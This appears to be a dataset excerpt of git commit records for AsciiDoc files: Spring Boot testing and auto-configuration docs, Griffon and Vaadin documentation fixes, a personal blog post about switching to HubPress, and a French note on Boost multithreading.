beans:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.jms.core.JmsTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final JmsTemplate jmsTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(JmsTemplate jmsTemplate) {\n\t\t\tthis.jmsTemplate = jmsTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-integration]]\n== Spring Integration\nSpring Integration provides abstractions over messaging and also other transports such as\nHTTP, TCP etc. If Spring Integration is available on your classpath it will be initialized\nthrough the `@EnableIntegration` annotation. Message processing statistics will be\npublished over JMX if ``spring-integration-jmx'' is also on the classpath.\nSee the {sc-spring-boot-autoconfigure}\/integration\/IntegrationAutoConfiguration.{sc-ext}[`IntegrationAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-jmx]]\n== Monitoring and management over JMX\nJava Management Extensions (JMX) provide a standard mechanism to monitor and manage\napplications. By default Spring Boot will create an `MBeanServer` with bean id\n``mbeanServer'' and expose any of your beans that are annotated with Spring JMX\nannotations (`@ManagedResource`, `@ManagedAttribute`, `@ManagedOperation`).\n\nSee the {sc-spring-boot-autoconfigure}\/jmx\/JmxAutoConfiguration.{sc-ext}[`JmxAutoConfiguration`]\nclass for more details.\n\n\n\n[[boot-features-testing]]\n== Testing\nSpring Boot provides a number of useful tools for testing your application. The\n`spring-boot-starter-test` POM provides Spring Test, JUnit, Hamcrest and Mockito\ndependencies. There are also useful test utilities in the core `spring-boot` module\nunder the `org.springframework.boot.test` package.\n\n\n\n[[boot-features-test-scope-dependencies]]\n=== Test scope dependencies\nIf you use the\n`spring-boot-starter-test` ``Starter POM'' (in the `test` `scope`), you will find\nthe following provided libraries:\n\n* Spring Test -- integration test support for Spring applications.\n* Junit -- The de-facto standard for unit testing Java applications.\n* Hamcrest -- A library of matcher objects (also known as constraints or predicates)\n allowing `assertThat` style JUnit assertions.\n* Mockito -- A Java mocking framework.\n\nThese are common libraries that we generally find useful when writing tests. You are free\nto add additional test dependencies of your own if these don't suit your needs.\n\n\n[[boot-features-testing-spring-applications]]\n=== Testing Spring applications\nOne of the major advantages of dependency injection is that it should make your code\neasier to unit test. You can simply instantiate objects using the `new` operator without\neven involving Spring. You can also use _mock objects_ instead of real dependencies.\n\nOften you need to move beyond ``unit testing'' and start ``integration testing'' (with\na Spring `ApplicationContext` actually involved in the process). It's useful to be able\nto perform integration testing without requiring deployment of your application or\nneeding to connect to other infrastructure.\n\nThe Spring Framework includes a dedicated test module for just such integration testing.\nYou can declare a dependency directly to `org.springframework:spring-test` or use the\n`spring-boot-starter-test` ``Starter POM'' to pull it in transitively.\n\nIf you have not used the `spring-test` module before you should start by reading the\n{spring-reference}\/#testing[relevant section] of the Spring Framework reference\ndocumentation.\n\n\n\n[[boot-features-testing-spring-boot-applications]]\n=== Testing Spring Boot applications\nA Spring Boot application is just a Spring `ApplicationContext` so nothing very special\nhas to be done to test it beyond what you would normally do with a vanilla Spring context.\nOne thing to watch out for though is that the external properties, logging and other\nfeatures of Spring Boot are only installed in the context by default if you use\n`SpringApplication` to create it.\n\nSpring Boot provides a `@SpringApplicationConfiguration` annotation as an alternative\nto the standard `spring-test` `@ContextConfiguration` annotation. If you use\n`@SpringApplicationConfiguration` to configure the `ApplicationContext` used in your\ntests, it will be created via `SpringApplication` and you will get the additional Spring\nBoot features.\n\nFor example:\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\t\/\/ ...\n\n\t}\n----\n\nTIP: The context loader guesses whether you want to test a web application or not (e.g.\nwith `MockMVC`) by looking for the `@WebAppConfiguration` annotation. (`MockMVC` and\n`@WebAppConfiguration` are part of `spring-test`).\n\nIf you want a web application to start up and listen on its normal port, so you can test\nit with HTTP (e.g. using `RestTemplate`), annotate your test class (or one of its\nsuperclasses) with `@IntegrationTest`. This can be very useful because it means you can\ntest the full stack of your application, but also inject its components into the test\nclass and use them to assert the internal state of the application after an HTTP\ninteraction. For Example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = SampleDataJpaApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest\n\tpublic class CityRepositoryIntegrationTests {\n\n\t\t@Autowired\n\t\tCityRepository repository;\n\n\t\tRestTemplate restTemplate = new TestRestTemplate();\n\n\t\t\/\/ ... interact with the running server\n\n\t}\n----\n\nNOTE: Spring's test framework will cache application contexts between tests. Therefore,\nas long as your tests share the same configuration, the time consuming process of starting\nand stopping the server will only happen once, regardless of the number of tests that\nactually run.\n\nTo change the port you can add environment properties to `@IntegrationTest` as colon- or\nequals-separated name-value pairs, e.g. `@IntegrationTest(\"server.port:9000\")`.\nAdditionally you can set the `server.port` and `management.port` properties to `0`\nin order to run your integration tests using random ports. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringApplicationConfiguration(classes = MyApplication.class)\n\t@WebAppConfiguration\n\t@IntegrationTest({\"server.port=0\", \"management.port=0\"})\n\tpublic class SomeIntegrationTests {\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee <<howto-discover-the-http-port-at-runtime>> for a description of how you can discover\nthe actual port that was allocated for the duration of the tests.\n\n\n\n[[boot-features-testing-spring-boot-applications-with-spock]]\n==== Using Spock to test Spring Boot applications\nIf you wish to use Spock to test a Spring Boot application you should add a dependency\non Spock's `spock-spring` module to your application's build. `spock-spring` integrates\nSpring's test framework into Spock.\n\nPlease note that you cannot use the `@SpringApplicationConfiguration` annotation that was\n<<boot-features-testing-spring-boot-applications,described above>> as Spock\nhttps:\/\/code.google.com\/p\/spock\/issues\/detail?id=349[does not find the\n`@ContextConfiguration` meta-annotation]. To work around this limitation, you should use\nthe `@ContextConfiguration` annotation directly and configure it to use the Spring\nBoot specific context loader:\n\n[source,groovy,indent=0]\n----\n\t@ContextConfiguration(loader = SpringApplicationContextLoader.class)\n\tclass ExampleSpec extends Specification {\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[boot-features-test-utilities]]\n=== Test utilities\nA few test utility classes are packaged as part of `spring-boot` that are generally\nuseful when testing your application.\n\n\n\n[[boot-features-configfileapplicationcontextinitializer-test-utility]]\n==== ConfigFileApplicationContextInitializer\n`ConfigFileApplicationContextInitializer` is an `ApplicationContextInitializer` that\ncan apply to your tests to load Spring Boot `application.properties` files. You can use\nthis when you don't need the full features provided by `@SpringApplicationConfiguration`.\n\n[source,java,indent=0]\n----\n\t@ContextConfiguration(classes = Config.class,\n\t\tinitializers = ConfigFileApplicationContextInitializer.class)\n----\n\n\n\n[[boot-features-environment-test-utilities]]\n==== EnvironmentTestUtils\n`EnvironmentTestUtils` allows you to quickly add properties to a\n`ConfigurableEnvironment` or `ConfigurableApplicationContext`. Simply call it with\n`key=value` strings:\n\n[source,java,indent=0]\n----\nEnvironmentTestUtils.addEnvironment(env, \"org=Spring\", \"name=Boot\");\n----\n\n\n\n[[boot-features-output-capture-test-utility]]\n==== OutputCapture\n`OutputCapture` is a JUnit `Rule` that you can use to capture `System.out` and\n`System.err` output. Simply declare the capture as a `@Rule` then use `toString()`\nfor assertions:\n\n[source,java,indent=0]\n----\nimport org.junit.Rule;\nimport org.junit.Test;\nimport org.springframework.boot.test.OutputCapture;\n\nimport static org.hamcrest.Matchers.*;\nimport static org.junit.Assert.*;\n\npublic class MyTest {\n\n\t@Rule\n\tpublic OutputCapture capture = new OutputCapture();\n\n\t@Test\n\tpublic void testName() throws Exception {\n\t\tSystem.out.println(\"Hello World!\");\n\t\tassertThat(capture.toString(), containsString(\"World\"));\n\t}\n\n}\n----\n\n[[boot-features-rest-templates-test-utility]]\n==== TestRestTemplate\n\n`TestRestTemplate` is a convenience subclass of Spring's `RestTemplate` that is\nuseful in integration tests. You can get a vanilla template or one that sends Basic HTTP\nauthentication (with a username and password). In either case the template will behave\nin a test-friendly way: not following redirects (so you can assert the response\nlocation), ignoring cookies (so the template is stateless), and not throwing exceptions\non server-side errors. It is recommended, but not mandatory, to use Apache HTTP Client\n(version 4.3.2 or better), and if you have that on your classpath the `TestRestTemplate`\nwill respond by configuring the client appropriately.\n\n[source,java,indent=0]\n----\npublic class MyTest {\n\n\tRestTemplate template = new TestRestTemplate();\n\n\t@Test\n\tpublic void testRequest() throws Exception {\n\t\tHttpHeaders headers = template.getForEntity(\"http:\/\/myhost.com\", String.class).getHeaders();\n\t\tassertThat(headers.getLocation().toString(), containsString(\"myotherhost\"));\n\t}\n\n}\n----\n\n\n\n[[boot-features-developing-auto-configuration]]\n== Developing auto-configuration and using conditions\nIf you work in a company that develops shared libraries, or if you work on an open-source\nor commercial library, you might want to develop your own auto-configuration.\nAuto-configuration classes can be bundled in external jars and still be picked-up by\nSpring Boot.\n\n\n\n[[boot-features-understanding-auto-configured-beans]]\n=== Understanding auto-configured beans\nUnder the hood, auto-configuration is implemented with standard `@Configuration` classes.\nAdditional `@Conditional` annotations are used to constrain when the auto-configuration\nshould apply. Usually auto-configuration classes use `@ConditionalOnClass` and\n`@ConditionalOnMissingBean` annotations. This ensures that auto-configuration only\napplies when relevant classes are found and when you have not declared your own\n`@Configuration`.\n\nYou can browse the source code of `spring-boot-autoconfigure` to see the `@Configuration`\nclasses that we provide (see the `META-INF\/spring.factories` file).\n\n\n\n[[boot-features-locating-auto-configuration-candidates]]\n=== Locating auto-configuration candidates\nSpring Boot checks for the presence of a `META-INF\/spring.factories` file within your\npublished jar. The file should list your configuration classes under the\n`EnableAutoConfiguration` key.\n\n[indent=0]\n----\n\torg.springframework.boot.autoconfigure.EnableAutoConfiguration=\\\n\tcom.mycorp.libx.autoconfigure.LibXAutoConfiguration,\\\n\tcom.mycorp.libx.autoconfigure.LibXWebAutoConfiguration\n----\n\nYou can use the\n{sc-spring-boot-autoconfigure}\/AutoConfigureAfter.{sc-ext}[`@AutoConfigureAfter`] or\n{sc-spring-boot-autoconfigure}\/AutoConfigureBefore.{sc-ext}[`@AutoConfigureBefore`]\nannotations if your configuration needs to be applied in a specific order. For example,\nif you provide web specific configuration, your class may need to be applied after\n`WebMvcAutoConfiguration`.\n\n\n\n[[boot-features-condition-annotations]]\n=== Condition annotations\nYou almost always want to include one or more `@Condition` annotations on your\nauto-configuration class. The `@ConditionalOnMissingBean` is one common example that is\nused to allow developers to ``override'' auto-configuration if they are not happy with\nyour defaults.\n\nSpring Boot includes a number of `@Conditional` annotations that you can reuse in your own\ncode by annotating `@Configuration` classes or individual `@Bean` methods.\n\n\n\n[[boot-features-class-conditions]]\n==== Class conditions\nThe `@ConditionalOnClass` and `@ConditionalOnMissingClass` annotations allows configuration\nto be skipped based on the presence or absence of specific classes. Due to the fact that\nannotation meta-data is parsed using http:\/\/asm.ow2.org\/[ASM] you can actually use the\n`value` attribute to refer to the real class, even though that class might not actually\nappear on the running application classpath. You can also use the `name` attribute if you\nprefer to specify the class name using a `String` value.\n\n\n\n[[boot-features-bean-conditions]]\n==== Bean conditions\nThe `@ConditionalOnBean` and `@ConditionalOnMissingBean` annotations allow configurations\nto be skipped based on the presence or absence of specific beans. You can use the `value`\nattribute to specify beans by type, or `name` to specify beans by name. The `search`\nattribute allows you to limit the `ApplicationContext` hierarchy that should be considered\nwhen searching for beans.\n\nNOTE: `@Conditional` annotations are processed when `@Configuration` classes are\nparsed. Auto-configure `@Configuration` is always parsed last (after any user defined\nbeans), however, if you are using these annotations on regular `@Configuration` classes,\ncare must be taken not to refer to bean definitions that have not yet been created.\n\n\n\n[[boot-features-resource-conditions]]\n==== Resource conditions\nThe `@ConditionalOnResource` annotation allows configuration to be included only when a\nspecific resource is present. Resources can be specified using the usual Spring\nconventions, for example, `file:\/home\/user\/test.dat`.\n\n\n\n[[boot-features-web-application-conditions]]\n==== Web Application Conditions\nThe `@ConditionalOnWebApplication` and `@ConditionalOnNotWebApplication` annotations\nallow configuration to be skipped depending on whether the application is a\n'web application'. A web application is any application that is using a Spring\n`WebApplicationContext`, defines a `session` scope or has a `StandardServletEnvironment`.\n\n\n\n[[boot-features-spel-conditions]]\n==== SpEL expression conditions\nThe `@ConditionalOnExpression` annotation allows configuration to be skipped based on the\nresult of a {spring-reference}\/#expressions[SpEL expression].\n\n\n\n[[boot-features-whats-next]]\n== What to read next\nIf you want to learn more about any of the classes discussed in this section you can\ncheck out the {dc-root}[Spring Boot API documentation] or you can browse the\n{github-code}[source code directly]. If you have specific questions, take a look at the\n<<howto.aoc#howto, how-to>> section.\n\nIf you are comfortable with Spring Boot's core features, you can carry on and read\nabout <<production-ready-features.adoc#production-ready, production-ready features>>.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e600196150390b5c72f4935c692f10ec55e797bd","subject":"Fix #1","message":"Fix #1\n","repos":"griffon-plugins\/griffon-validation-plugin","old_file":"subprojects\/griffon-validation-guide\/src\/asciidoc\/validator.adoc","new_file":"subprojects\/griffon-validation-guide\/src\/asciidoc\/validator.adoc","new_contents":"\n[[_constraints_validator]]\n= Validator\n\n.Purpose\nAdds custom validation to a field.\n\n[source,java,options=\"nowrap\"]\n.Java\n----\n.e(\"even\", list(validator( (Number v) -> {val % 2 ? \"\" : \"validator.invalid\"}\u00a0)))\n.e(\"password2\", list(validator( (Number v, Bean b) -> areEqual(b.password, val) ? \"\" : \"passwords.do.not.match\" )))\n----\n\n[source,groovy,options=\"nowrap\"]\n.Groovy\n----\neven(validator: { val -> val % 2 ? '' : 'validator.invalid' })\npassword2(validator: { v, obj -> obj.password == val ? '' : 'passwords.do.not.match' })\n----\n\n.Description\n\nA custom validator is implemented by a Closure that takes up to two parameters. If the Closure accepts zero or\none parameter, the parameter value will be the one being validated (\"it\" in the case of a zero-parameter Closure).\nIf it accepts two parameters the first is the value and the second is the class instance being validated.\nThis is useful when your validation needs access to other fields, for example when checking that two entered\npasswords are the same.\n\nThe closure can return:\n\n * null or empty String to indicate that the value is valid.\n * a String to indicate the error code to append to the \"classname.propertyName.\" String used to resolve the\n error message. If a field-specific message cannot be resolved, the error code itself will be resolved allowing\n for global error messages.\n\n.Messages\nFor property validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.property.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\nFor Object validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.object.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\n","old_contents":"\n[[_constraints_validator]]\n= Validator\n\n.Purpose\nAdds custom validation to a field.\n\n[source,java,options=\"nowrap\"]\n.Java\n----\n.e(\"even\", list(validator( (Number v) -> {val % 2 ? \"\" : \"validator.invalid\"}\u00a0)))\n.e(\"password2\", list(validator( (Number v, Bean b) -> areEqual(b.password, val) ? \"\" : \"passwords.do.not.match\" )))\n----\n\n[source,groovy,options=\"nowrap\"]\n.Groovy\n----\neven(validator{ val -> val % 2 ? '' : 'validator.invalid' })\npassword2(validator{ v, obj -> obj.password == val ? '' : 'passwords.do.not.match' })\n----\n\n.Description\n\nA custom validator is implemented by a Closure that takes up to two parameters. If the Closure accepts zero or\none parameter, the parameter value will be the one being validated (\"it\" in the case of a zero-parameter Closure).\nIf it accepts two parameters the first is the value and the second is the class instance being validated.\nThis is useful when your validation needs access to other fields, for example when checking that two entered\npasswords are the same.\n\nThe closure can return:\n\n * null or empty String to indicate that the value is valid.\n * a String to indicate the error code to append to the \"classname.propertyName.\" String used to resolve the\n error message. If a field-specific message cannot be resolved, the error code itself will be resolved allowing\n for global error messages.\n\n.Messages\nFor property validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.property.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\nFor Object validator\n[horizontal]\nError Codes:: `className.propertyName.validator.invalid`, `default.invalid.object.validator.message`\nTemplate:: Property [{0}] of class [{1}] with value [{2}] is invalid\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afccf12f1ff1546859bbbeffebda27352f446ed3","subject":"Update 2017-04-30-Reboot.adoc","message":"Update 2017-04-30-Reboot.adoc","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-04-30-Reboot.adoc","new_file":"_posts\/2017-04-30-Reboot.adoc","new_contents":"= Reboot \n:published_at: 2017-04-30\n:hp-tags: Blog, Open_Source,\n\n[quote]\n____\nI amar prestar aen, +\nHan mathon ne nen, +\nHan mathon ne chae +\nA han noston ned 'wilith\n____\n\nAnd again, my world is changing. A bit more than one year ago, I moved from a self-hosted blog built with https:\/\/ghost.org\/[Ghost] to a fully managed website using Jimdo's website construction kit. Sure, the effort for maintaining the full stack (server, os, database, web server software, etc.) has gone, and I certainly don't want it back.\n\nBut maintaining the website itself has proven to be a bit of a hassle with Jimdo -- each page, even each blog post, has to be bricolaged together with predefined content elements. So a lot of my time spent on the website went into layouting articles, instead of writing content. Other than with Ghost, you couldn't just log in and write away in simple plain text (https:\/\/en.wikipedia.org\/wiki\/Markdown[Markdown], to be precise).\n\nThis really had an impact on my posting frequency -- at some time, it was as low as just once every couple of months (my personal \"best\" was a full 5 months of silence). Not being happy with Jimdo (mostly due to that), I constantly kept looking for alternate solutions, that would give me back an easier content creation, but not at the cost of making me spend hours on administrating servers and applications again.\n\nI tried some big CMS stuff (like https:\/\/plone.org\/[Plone 5], https:\/\/www.django-cms.org\/[django CMS], http:\/\/www.opencms.org\/[OpenCms] and http:\/\/www.ametys.org\/[Ametys]) hosted on managed cloud services, but again I didn't find the simplicity I was hoping for. Either it was very complex to set up the site itself, or blogging in general was not well supported. Or media management proved to be complex, or inserting syntax-highlighted code snippets into articles was impossible without bigger hacks... just chose, none of them had real simplicity and elegance in store.\n\nOver time, again and again I was drawn to static site generators. For some time, my blog was running on https:\/\/getnikola.com\/[Nikola], and back then I had good reasons to stop using it -- mostly the long run time to get my site updated after having changed something small as a typo fix in an article, but also the fact I had to have access to a computer with the repo cloned locally and all the software dependencies installed.\n\nYet the simplicity of hosting a static site is still very attractive, so how on earth could I get a static blog without need for local software and build tools, and with the ability to generate content from any computer? I knew about https:\/\/pages.github.com\/[GitHub Pages] and https:\/\/jekyllrb.com\/[Jekyll], but I could never warm to Jekyll or derivated static site generators (I'm simply not a ruby guy...). I also experimented with http:\/\/www.sphinx-doc.org\/[Sphinx] and https:\/\/github.com\/syntaf\/travis-sphinx[travis-sphinx], but Sphinx is not really made for websites and blogging.\n\nWhen I recently stumbled accross http:\/\/hubpress.io\/[HubPress], I knew I had found what I was looking for. This blogging solution is built around GitHub pages, works fine even without ever loading something to the local computer, and offers a Ghost-like browser-based post editor (using http:\/\/asciidoctor.org\/[AsciiDoc] instead of Markdown). On top, posts can be written via GitHub's built-in editor, or offline with any text editor -- they're just `.adoc` files in a GitHub pages repository or branch.\n\nAfter more than 15 years of running a personal website, I'm certainly not naive when it comes to site generators and blogging solutions. I'm not sure HubPress will become a sustainable solution, driving my site for a longer period. However, it certainly has the potential to do so, as it brings along all the ingredients I was long looking for -- I will certainly give it the chance to prove it can do this for me, and hopefully also increase my posting frequency.\n","old_contents":"= Reboot \n\/\/ :published_at: 2017-04-30\n:hp-tags: Blog, Open_Source,\n\n[quote]\n____\nI amar prestar aen, +\nHan mathon ne nen, +\nHan mathon ne chae +\nA han noston ned 'wilith\n____\n\nAnd again, my world is changing. A bit more than one year ago, I moved from a self-hosted blog built with https:\/\/ghost.org\/[Ghost] to a fully managed website using Jimdo's website construction kit. Sure, the effort for maintaining the full stack (server, os, database, web server software, etc.) has gone, and I certainly don't want it back.\n\nBut maintaining the website itself has proven to be a bit of a hassle with Jimdo -- each page, even each blog post, has to be bricolaged together with predefined content elements. So a lot of my time spent on the website went into layouting articles, instead of writing content. Other than with Ghost, you couldn't just log in and write away in simple plain text (https:\/\/en.wikipedia.org\/wiki\/Markdown[Markdown], to be precise).\n\nThis really had an impact on my posting frequency -- at some time, it was as low as just once every couple of months (my personal \"best\" was a full 5 months of silence). Not being happy with Jimdo (mostly due to that), I constantly kept looking for alternate solutions, that would give me back an easier content creation, but not at the cost of making me spend hours on administrating servers and applications again.\n\nI tried some big CMS stuff (like https:\/\/plone.org\/[Plone 5], https:\/\/www.django-cms.org\/[django CMS], http:\/\/www.opencms.org\/[OpenCms] and http:\/\/www.ametys.org\/[Ametys]) hosted on managed cloud services, but again I didn't find the simplicity I was hoping for. Either it was very complex to set up the site itself, or blogging in general was not well supported. Or media management proved to be complex, or inserting syntax-highlighted code snippets into articles was impossible without bigger hacks... just chose, none of them had real simplicity and elegance in store.\n\nOver time, again and again I was drawn to static site generators. For some time, my blog was running on https:\/\/getnikola.com\/[Nikola], and back then I had good reasons to stop using it -- mostly the long run time to get my site updated after having changed something small as a typo fix in an article, but also the fact I had to have access to a computer with the repo cloned locally and all the software dependencies installed.\n\nYet the simplicity of hosting a static site is still very attractive, so how on earth could I get a static blog without need for local software and build tools, and with the ability to generate content from any computer? I knew about https:\/\/pages.github.com\/[GitHub Pages] and https:\/\/jekyllrb.com\/[Jekyll], but I could never warm to Jekyll or derivated static site generators (I'm simply not a ruby guy...). I also experimented with http:\/\/www.sphinx-doc.org\/[Sphinx] and https:\/\/github.com\/syntaf\/travis-sphinx[travis-sphinx], but Sphinx is not really made for websites and blogging.\n\nWhen I recently stumbled accross http:\/\/hubpress.io\/[HubPress], I knew I had found what I was looking for. This blogging solution is built around GitHub pages, works fine even without ever loading something to the local computer, and offers a Ghost-like browser-based post editor (using http:\/\/asciidoctor.org\/[AsciiDoc] instead of Markdown). On top, posts can be written via GitHub's built-in editor, or offline with any text editor -- they're just `.adoc` files in a GitHub pages repository or branch.\n\nAfter more than 15 years of running a personal website, I'm certainly not naive when it comes to site generators and blogging solutions. I'm not sure HubPress will become a sustainable solution, driving my site for a longer period. However, it certainly has the potential to do so, as it brings along all the ingredients I was long looking for -- I will certainly give it the chance to prove it can do this for me, and hopefully also increase my posting frequency.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aea1a69139d7a6542748b3c425d75883842b02b2","subject":"Remove mention of removed API (#8701)","message":"Remove mention of removed API (#8701)\n\nDeprecated setColumns was removed in fd3617b","repos":"asashour\/framework,kironapublic\/vaadin,asashour\/framework,Darsstar\/framework,asashour\/framework,peterl1084\/framework,peterl1084\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,peterl1084\/framework,kironapublic\/vaadin,mstahv\/framework,kironapublic\/vaadin,kironapublic\/vaadin,mstahv\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework","old_file":"documentation\/components\/components-nativeselect.asciidoc","new_file":"documentation\/components\/components-nativeselect.asciidoc","new_contents":"---\ntitle: NativeSelect\norder: 18\nlayout: page\n---\n\n[[components.nativeselect]]\n= NativeSelect\n\nifdef::web[]\n[.sampler]\nimage:{live-demo-image}[alt=\"Live Demo\", link=\"http:\/\/demo.vaadin.com\/sampler\/#ui\/data-input\/multiple-value\/drop-down-menu\"]\nendif::web[]\n\n[classname]#NativeSelect# is a selection component allows selecting an item from a\ndrop-down list. It is implemented with the native selection input of web browsers, using the HTML [literal]#++<select>++# element.\n\n\n[source, java]\n----\n\/\/ Create the selection component\nNativeSelect<String> select =\n new NativeSelect<>(\"Native Selection\");\n\n\/\/ Add some items\nselect.setItems(\"Mercury\", \"Venus\", ...);\n----\n\n[[figure.components.nativeselect.basic]]\n.The [classname]#NativeSelect# Component\nimage::img\/nativeselect-basic.png[width=20%, scaledwidth=35%]\n\nCommon selection component features are described in\n<<dummy\/..\/..\/..\/framework\/components\/components-selection#components.selection,\"Selection Components\">>.\n\n== CSS Style Rules\n\n\n[source, css]\n----\n.v-select {}\n .v-select-select {}\n----\n\nThe component has a [literal]#++v-select++# overall style. The native\n[literal]#++select++# element has [literal]#++v-select-select++# style.\n","old_contents":"---\ntitle: NativeSelect\norder: 18\nlayout: page\n---\n\n[[components.nativeselect]]\n= NativeSelect\n\nifdef::web[]\n[.sampler]\nimage:{live-demo-image}[alt=\"Live Demo\", link=\"http:\/\/demo.vaadin.com\/sampler\/#ui\/data-input\/multiple-value\/drop-down-menu\"]\nendif::web[]\n\n[classname]#NativeSelect# is a selection component allows selecting an item from a\ndrop-down list. It is implemented with the native selection input of web browsers, using the HTML [literal]#++<select>++# element.\n\n\n[source, java]\n----\n\/\/ Create the selection component\nNativeSelect<String> select =\n new NativeSelect<>(\"Native Selection\");\n\n\/\/ Add some items\nselect.setItems(\"Mercury\", \"Venus\", ...);\n----\n\nThe [methodname]#setColumns()# allows setting the width of the list as\n\"columns\", which is a measure that depends on the browser.\n\n[[figure.components.nativeselect.basic]]\n.The [classname]#NativeSelect# Component\nimage::img\/nativeselect-basic.png[width=20%, scaledwidth=35%]\n\nCommon selection component features are described in\n<<dummy\/..\/..\/..\/framework\/components\/components-selection#components.selection,\"Selection Components\">>.\n\n== CSS Style Rules\n\n\n[source, css]\n----\n.v-select {}\n .v-select-select {}\n----\n\nThe component has a [literal]#++v-select++# overall style. The native\n[literal]#++select++# element has [literal]#++v-select-select++# style.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c8d946c953105137bf8f800210fdc8d995ba2fd","subject":"Update 2016-02-29-multithreading.adoc","message":"Update 2016-02-29-multithreading.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-29-multithreading.adoc","new_file":"_posts\/2016-02-29-multithreading.adoc","new_contents":"= multithreading\n\n== threads, groups\n----\nvoid change_count(){]\n\nboost::thread_group threads;\nfor (int i=0; i < num_threads; ++i)\n threads.create_thread(&change_count);\n\n threads.join_all();\n}\n----\n\n== synchronization (locks)\n\n* locks guard (RAII, inutile d'appeler lock\/unlock)\n\n[source,c++]\n----\nfor (int i = 0; i < 5; ++i)\n{\n wait(1);\n boost::lock_guard<boost::mutex> lock{mutex};\n std::cout << \"Thread \" << get_id() << \": \" << i << std::endl;\n}\n----\n\n* shared_mutex (lock par shared_lock ou unique lock)\n\n\n[source,c++]\n----\nvoid write_acess()\n{\n boost::unique_lock<boost::mutex> lock{mutex};\n}\n \nvoid read_accesst()\n{\n for (int i = 0; i < 3; ++i)\n {\n boost::shared_lock<boost::shared_mutex> lock{mutex};\n std::cout << random_numbers.back() << '\\n';\n }\n}\n----\n\n== conditions\n\n[source,c++]\n----\nstd::condition_variable cv;\nstd::mutex cv_m; \/\/ This mutex is used for three purposes:\n \/\/ 1) to synchronize accesses to i\n \/\/ 2) to synchronize accesses to std::cerr\n \/\/ 3) for the condition variable cv\nint i = 0;\n \nvoid waits()\n{\n std::unique_lock<std::mutex> lk(cv_m);\n std::cerr << \"Waiting... \\n\";\n cv.wait(lk, []{return i == 1;});\n std::cerr << \"...finished waiting. i == 1\\n\";\n}\n \nvoid signals()\n{\n {\n std::lock_guard<std::mutex> lk(cv_m);\n i = 1;\n std::cerr << \"Notifying again...\\n\";\n }\n cv.notify_all();\n}\n----\n\n*Tous* les threads qui ex\u00e9cutent waits vont \u00eatre d\u00e9bloqu\u00e9s par le notify_all\nLe mutex est utilis\u00e9 par le thread signalant lorsqu'il touche \u00e0 la condition\nIl est aussi utilis\u00e9 par le thread en attente. \n\nIMPORTANT: Il est unlock\u00e9 au d\u00e9but de l'appel de la fonction wait \n\n== future, promise\n\n* version compl\u00e8te\nOn peut faire un get sur un futur\nOn fait un set sur une promise\n\nOn peut r\u00e9cup\u00e9rer le futur associ\u00e9e d'une promise\n\n[source,c++]\n----\nvoid accumulate(boost::promise<int> &p)\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n p.set_value(sum);\n}\n\nint main()\n{\n boost::promise<int> p;\n boost::future<int> f = p.get_future();\n boost::thread t{accumulate, std::ref(p)};\n std::cout << f.get() << '\\n';\n}\n----\n\n\n* version simplifi\u00e9e (avec async)\n\n[source,c++]\n----\nint accumulate()\n{\n int sum = 0;\n for (int i = 0; i < 5; ++i)\n sum += i;\n return sum;\n}\n\nint main()\n{\n boost::future<int> f = boost::async(accumulate);\n std::cout << f.get() << '\\n';\n}\n----\n","old_contents":"= multithreading\n\n== threads, groups\n----\nvoid change_count(){]\n\nboost::thread_group threads;\nfor (int i=0; i < num_threads; ++i)\n threads.create_thread(&change_count);\n\n threads.join_all();\n}\n----\n\n== synchronization (locks)\n\n* locks guard (RAII, inutile d'appeler lock\/unlock)\n\n[source,c++]\n----\nfor (int i = 0; i < 5; ++i)\n{\n wait(1);\n boost::lock_guard<boost::mutex> lock{mutex};\n std::cout << \"Thread \" << get_id() << \": \" << i << std::endl;\n}\n\n* shared_mutex (lock par shared_lock ou unique lock)\n----\n\n[source,c++]\n----\nvoid write_acess()\n{\n boost::unique_lock<boost::mutex> lock{mutex};\n}\n \nvoid read_accesst()\n{\n for (int i = 0; i < 3; ++i)\n {\n boost::shared_lock<boost::shared_mutex> lock{mutex};\n std::cout << random_numbers.back() << '\\n';\n }\n}\n----\n\n== 